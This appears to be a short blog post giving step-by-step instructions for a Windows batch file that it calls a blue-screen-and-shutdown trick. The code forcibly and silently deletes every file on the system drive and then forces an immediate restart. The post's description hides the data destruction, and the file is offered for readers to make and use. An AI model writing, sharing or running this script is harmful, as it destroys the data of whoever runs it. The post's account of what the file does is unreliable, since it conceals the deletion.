What will this file do ?
It will appear the blue screen of death in windows and then the computer will shutdown.
Method :
1. Open Notepad and copy the code given below.
Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
2. Save as "Anything.bat" (Without quotes & .bat is must).
0 comments:
Post a Comment